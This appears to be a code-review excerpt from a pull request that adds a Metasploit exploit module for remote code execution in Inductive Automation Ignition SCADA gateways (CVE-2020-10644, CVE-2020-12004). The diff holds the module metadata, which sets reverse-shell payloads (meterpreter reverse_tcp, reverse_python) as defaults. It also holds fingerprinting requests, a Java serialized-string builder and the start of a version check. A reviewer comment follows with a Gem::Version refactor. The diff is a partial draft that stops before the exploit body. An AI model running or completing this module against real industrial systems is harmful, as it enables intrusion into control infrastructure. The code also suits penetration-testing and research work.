modules/exploits/multi/scada/inductive_ignition_rce.rb

```diff
@@ -0,0 +1,212 @@
+          'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
+        ],
+        'References' =>
+          [
+            [ 'URL', 'https://www.zerodayinitiative.com/blog/2020/6/10/a-trio-of-bugs-used-to-exploit-inductive-automation-at-pwn2own-miami'],
+            [ 'URL', 'GITHUB_TODO'],
+            [ 'CVE', '2020-10644'],
+            [ 'CVE', '2020-12004'],
+            [ 'ZDI', '20-685'],
+            [ 'ZDI', '20-685'],
+          ],
+        'Privileged' => true,
+        'Platform' => %w[unix win],
+        'DefaultOptions' =>
+          {
+            'WfsDelay' => 15
+          },
+        'Targets' =>
+          [
+            [ 'Automatic', {} ],
+            [
+              'Windows',
+              'Platform' => 'win',
+              'DefaultOptions' =>
+                { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
+            ],
+            [
+              'Linux',
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD],
+              'DefaultOptions' =>
+                { 'PAYLOAD' => 'cmd/unix/reverse_python' },
+            ]
+          ],
+        'DisclosureDate' => '2020-06-11',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8088)
+      ]
+    )
+  end
+
+  def version_get
+    res = send_request_cgi({
+      'uri' => '/system/gwinfo',
+      'method' => 'GET'
+    })
+
+    if res && res.code == 302
+      # try again, versions < 8 use a different URL
+      res = send_request_cgi({
+        'uri' => '/main/system/gwinfo',
+        'method' => 'GET'
+      })
+    end
+
+    if res && res.code == 200
+      # Regexp to get the version of the server
+      version = res.body.match(/;Version=([0-9\.]{3,});/)
+      if version
+        return version[1]
+      end
+    end
+    return ''
+  end
+
+  def os_get
+    res = send_request_cgi({
+      'uri' => '/system/gwinfo',
+      'method' => 'GET'
+    })
+    if res && res.code == 200
+      # Regexp to get the OS
+      os = res.body.match(/OS=([a-zA-Z0-9\s]+);/)
+      return os[1]
+    end
+  end
+
+  def create_java_str(payload)
+    (
+      "\xac\xed" +                  # STREAM_MAGIC
+      "\x00\x05" +                  # STREAM_VERSION
+      "\x74" +                      # String object
+      [payload.length].pack('n') +  # length
+      payload
+    ).force_encoding('ascii')       # is this needed in msf?
+  end
+
+  def check
+    version = version_get
+    version = version.split('.')
+    if version.length < 3
+      fail_with(Failure::Unknown, 'Failed to obtain target version')
+    end
+    print_status("#{peer} - Detected version #{version[0]}.#{version[1]}.#{version[2]}")
+    # versions between 8.0.0 and 8.0.7 (inclusive) are vulnerable
+    if version[0].to_i == 8 && version[1].to_i == 0 && version[2].to_i < 8
```

Comment:
Another option would be to use `Gem::Version` for version comparisons:
```suggestion
    version = Gem::Version.new(version_get)
    if version.segments.length < 3
      fail_with(Failure::Unknown, 'Failed to obtain target version')
    end
    print_status("#{peer} - Detected version #{version.version}")
    if version >= Gem::Version.new('8.0.0') && version <= Gem::Version.new('8.0.7')
```